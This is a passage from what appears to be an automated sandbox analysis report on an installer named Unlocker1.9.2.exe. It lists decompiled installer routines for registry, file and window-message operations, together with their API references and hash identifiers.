                                                                                                                                                              						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t13 = RegDeleteValueA(_t22, E004029F6(0x33)); // executed
                                                                                                                                                              						_t19 = _t13;
                                                                                                                                                              						RegCloseKey(_t22);
                                                                                                                                                              						L4:
                                                                                                                                                              						if(_t19 != _t15) {
                                                                                                                                                              							goto L6;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t23 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}











                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00402B00: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B28
                                                                                                                                                              • RegDeleteValueA.KERNELBASE(00000000,00000000,00000033), ref: 004022C6
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022CF
Memory Dump Source
• Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 849931509-0
                                                                                                                                                              • Opcode ID: ee70e0c8ea5e76c5473df7986e6ddf19852834f1384ac6f07000c38f1b823d4b
                                                                                                                                                              • Instruction ID: c586e56b1d430ee1cb1ae4f59be608967060f6779667f9d5bdce91e390546033
                                                                                                                                                              • Opcode Fuzzy Hash: ee70e0c8ea5e76c5473df7986e6ddf19852834f1384ac6f07000c38f1b823d4b
                                                                                                                                                              • Instruction Fuzzy Hash: B9F04472A00211ABDB20BFA49F4DABF7268AB40354F10453BF601B61C1D9B94D42A66D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00404E4D(signed int __eax) {
                                                                                                                                                              				intOrPtr _v0;
                                                                                                                                                              				intOrPtr _t8;
                                                                                                                                                              				intOrPtr _t10;
                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                              				intOrPtr* _t12;
                                                                                                                                                              
                                                                                                                                                              				_t11 =  *0x423ea8; // 0x73f1dc
                                                                                                                                                              				_t10 =  *0x423eac; // 0x7
                                                                                                                                                              				__imp__OleInitialize(0);
                                                                                                                                                              				 *0x423f38 =  *0x423f38 | __eax;
                                                                                                                                                              				E00403DDB(0);
                                                                                                                                                              				if(_t10 != 0) {
                                                                                                                                                              					_t12 = _t11 + 0xc;
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t10 = _t10 - 1;
                                                                                                                                                              						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						_t12 = _t12 + 0x418;
                                                                                                                                                              						if(_t10 != 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						} else {
                                                                                                                                                              						}
                                                                                                                                                              						goto L7;
                                                                                                                                                              					}
                                                                                                                                                              					 *0x423f0c =  *0x423f0c + 1;
                                                                                                                                                              				}
                                                                                                                                                              				L7:
                                                                                                                                                              				E00403DDB(0x404); // executed
                                                                                                                                                              				__imp__OleUninitialize();
                                                                                                                                                              				_t8 =  *0x423f0c; // 0x0
                                                                                                                                                              				return _t8;
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00404E5D
                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageA.USER32(0014005A,00000000,00000000,00000000), ref: 00403DED
                                                                                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 00404EA9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2896919175-0
                                                                                                                                                              • Opcode ID: a71bf3315524e495bb63ac7db680478635d871b9932b013c5ee158b9648a44a1
                                                                                                                                                              • Instruction ID: dd00d1d9fa511fdb2abfd92f861b37bc179417f7df103cd37a6f8771cbc5aef0
                                                                                                                                                              • Opcode Fuzzy Hash: a71bf3315524e495bb63ac7db680478635d871b9932b013c5ee158b9648a44a1
                                                                                                                                                              • Instruction Fuzzy Hash: D3F0F0B2A00200AAD7201F64ED00B167BB4ABC0316F06003BFF04B62E0D3795802869D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402866(signed int __eax) {
                                                                                                                                                              				RECT* _t10;
                                                                                                                                                              				signed int _t12;
                                                                                                                                                              				void* _t16;
                                                                                                                                                              
                                                                                                                                                              				_t12 =  *0x421478; // 0x1
                                                                                                                                                              				SendMessageA( *(_t16 - 0x34), 0xb, _t12 & __eax, _t10); // executed
                                                                                                                                                              				if( *((intOrPtr*)(_t16 - 0x24)) != _t10) {
                                                                                                                                                              					InvalidateRect( *(_t16 - 0x34), _t10, _t10);
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t16 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(?,0000000B,00000001), ref: 00402875
                                                                                                                                                              • InvalidateRect.USER32(?), ref: 00402885
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InvalidateMessageRectSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 909852535-0
                                                                                                                                                              • Opcode ID: 46183b671d0a66796b8da51e49bc5f75bb78f43e79dd776066acc7c5e036528c
                                                                                                                                                              • Instruction ID: 649a040586aa62cc82974a2302a351b88b3488b792cf185d27debadfb860ecc8
                                                                                                                                                              • Opcode Fuzzy Hash: 46183b671d0a66796b8da51e49bc5f75bb78f43e79dd776066acc7c5e036528c
                                                                                                                                                              • Instruction Fuzzy Hash: 34E08C72B00104BFEB10DFA4FE859AE7BBAEB40349B1000BAF201F10A0D2351D00CA28
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DAB
                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DB6
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                                              • Opcode ID: 180e04144bc7a0d59582f7e45b03d1942a0b442326c071ed28d9fde4447ebb30
                                                                                                                                                              • Instruction ID: 6b7a785092ec91fc8b74b141f8716fcdbeee11c7e0160613a2a2c5ad315415b5
                                                                                                                                                              • Opcode Fuzzy Hash: 180e04144bc7a0d59582f7e45b03d1942a0b442326c071ed28d9fde4447ebb30
                                                                                                                                                              • Instruction Fuzzy Hash: 96E0C272F08210DBD710FBB4AE899AE3674DB403A9B10453BF503F20C1D2B89C8196EE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E004056B4(CHAR* _a4, long _a8, long _a12) {
                                                                                                                                                              				signed int _t5;
                                                                                                                                                              				void* _t6;
                                                                                                                                                              
                                                                                                                                                              				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                                                                              				asm("sbb ecx, ecx");
                                                                                                                                                              				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                                                              				return _t6;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 004056B8
                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                              • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                                                              • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                                                                                              • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                                                              • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040344C() {
                                                                                                                                                              				void* _t1;
                                                                                                                                                              				void* _t3;
                                                                                                                                                              				void* _t5;
                                                                                                                                                              				signed int _t7;
                                                                                                                                                              
                                                                                                                                                              				_t1 =  *0x409014; // 0xffffffff
                                                                                                                                                              				if(_t1 != 0xffffffff) {
                                                                                                                                                              					CloseHandle(_t1);
                                                                                                                                                              					 *0x409014 =  *0x409014 | 0xffffffff;
                                                                                                                                                              					_t7 =  *0x409014;
                                                                                                                                                              				}
                                                                                                                                                              				E00403491();
                                                                                                                                                              				_t3 = E00405302(_t5, _t7, "C:\\Users\\jones\\AppData\\Local\\Temp\\nsv5446.tmp\\", 7); // executed
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,004032BC,00000000), ref: 00403457
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsv5446.tmp\, xrefs: 0040346B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\
                                                                                                                                                              • API String ID: 2962429428-4210766794
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405695(CHAR* _a4) {
                                                                                                                                                              				signed char _t3;
                                                                                                                                                              				int _t5;
                                                                                                                                                              
                                                                                                                                                              				_t3 = GetFileAttributesA(_a4); // executed
                                                                                                                                                              				if(_t3 != 0xffffffff) {
                                                                                                                                                              					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
                                                                                                                                                              					return _t5;
                                                                                                                                                              				}
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,004054A0,?,?,?), ref: 00405699
                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004056AB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402223(int __eax, CHAR* __ebx) {
                                                                                                                                                              				CHAR* _t11;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              				CHAR* _t14;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              				int _t22;
                                                                                                                                                              
                                                                                                                                                              				_t11 = __ebx;
                                                                                                                                                              				_t5 = __eax;
                                                                                                                                                              				_t14 = 0;
                                                                                                                                                              				if(__eax != __ebx) {
                                                                                                                                                              					__eax = E004029F6(__ebx);
                                                                                                                                                              				}
                                                                                                                                                              				if(_t13 != _t11) {
                                                                                                                                                              					_t14 = E004029F6(0x11);
                                                                                                                                                              				}
                                                                                                                                                              				if( *((intOrPtr*)(_t18 - 0x14)) != _t11) {
                                                                                                                                                              					_t11 = E004029F6(0x22);
                                                                                                                                                              				}
                                                                                                                                                              				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E004029F6(0xffffffcd)); // executed
                                                                                                                                                              				_t22 = _t5;
                                                                                                                                                              				if(_t22 == 0) {
                                                                                                                                                              					 *((intOrPtr*)(_t18 - 4)) = 1;
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t18 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040225C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 390214022-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040304E(void* _a4, long _a8) {
                                                                                                                                                              				int _t6;
                                                                                                                                                              				long _t10;
                                                                                                                                                              
                                                                                                                                                              				_t10 = _a8;
                                                                                                                                                              				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                                                                                                                                              				if(_t6 == 0 || _a8 != _t10) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					return 1;
                                                                                                                                                              				}
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EA7,000000FF,00000004,00000000,00000000,00000000), ref: 00403065
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E00402B00(void* __eflags, void* _a4) {
                                                                                                                                                              				signed int _t6;
                                                                                                                                                              				char* _t8;
                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                              				signed int _t11;
                                                                                                                                                              
                                                                                                                                                              				_t6 =  *0x423f30; // 0x100
                                                                                                                                                              				_t8 = E004029F6(0x22);
                                                                                                                                                              				_t9 =  *0x409b48; // 0x19f570
                                                                                                                                                              				_t11 = RegOpenKeyExA(E00402AEB( *((intOrPtr*)(_t9 + 4))), _t8, 0, _t6 | _a4,  &_a4); // executed
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				return  !( ~_t11) & _a4;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B28
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403D8F(intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _v0;
                                                                                                                                                              				struct HWND__* _v4;
                                                                                                                                                              				int _t7;
                                                                                                                                                              				void* _t8;
                                                                                                                                                              				void* _t9;
                                                                                                                                                              				void* _t10;
                                                                                                                                                              
                                                                                                                                                              				_t7 = SetDlgItemTextA(_v4, _v0 + 0x3e8, E004059FF(_t8, _t9, _t10, 0, _a12)); // executed
                                                                                                                                                              				return _t7;
                                                                                                                                                              			}










                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemText
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3367045223-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403DDB(int _a4) {
                                                                                                                                                              				struct HWND__* _t2;
                                                                                                                                                              				long _t3;
                                                                                                                                                              
                                                                                                                                                              				_t2 =  *0x423658; // 0x14005a
                                                                                                                                                              				if(_t2 != 0) {
                                                                                                                                                              					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
                                                                                                                                                              					return _t3;
                                                                                                                                                              				}
                                                                                                                                                              				return _t2;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(0014005A,00000000,00000000,00000000), ref: 00403DED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403DC4(int _a4) {
                                                                                                                                                              				long _t2;
                                                                                                                                                              
                                                                                                                                                              				_t2 = SendMessageA( *0x423e88, 0x28, _a4, 1); // executed
                                                                                                                                                              				return _t2;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: 9b8c2a1a4dccebde683369f87605a88067a0545aeab7591961bdf6cdb6557e70
                                                                                                                                                              • Instruction ID: 852617af31e01c2ae6d6bbe4641feff1a9708b3e48e1883f9033c05fa9abbd48
                                                                                                                                                              • Opcode Fuzzy Hash: 9b8c2a1a4dccebde683369f87605a88067a0545aeab7591961bdf6cdb6557e70
                                                                                                                                                              • Instruction Fuzzy Hash: 38B01276BC4201BBDE216F00DE09F457E72E764702F018078B304240F0C6F240A5DB09
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403080(long _a4) {
                                                                                                                                                              				long _t2;
                                                                                                                                                              
                                                                                                                                                              				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                                                                                                                                              				return _t2;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,0000CDE4), ref: 0040308E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                              • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                                                              • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                                                                              • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                                                              • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405282(int _a4, CHAR* _a8) {
                                                                                                                                                              				int _t3;
                                                                                                                                                              
                                                                                                                                                              				_t3 = GetDlgItemTextA( *0x423658, _a4, _a8, 0x400); // executed
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemText
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3367045223-0
                                                                                                                                                              • Opcode ID: 660c1fc254df36beb57d81b90febdada7011a4db7affac3806782aa2ca0af1b7
                                                                                                                                                              • Instruction ID: 64f8da0eb6fa4cceecf9efc48ddd89885d4d712a4f1a1a74ac23683e4b195719
                                                                                                                                                              • Opcode Fuzzy Hash: 660c1fc254df36beb57d81b90febdada7011a4db7affac3806782aa2ca0af1b7
                                                                                                                                                              • Instruction Fuzzy Hash: 42B09276608240BFCA125F40DE04E0ABB72BBA4312F00C424BB98641B082325422EF0A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

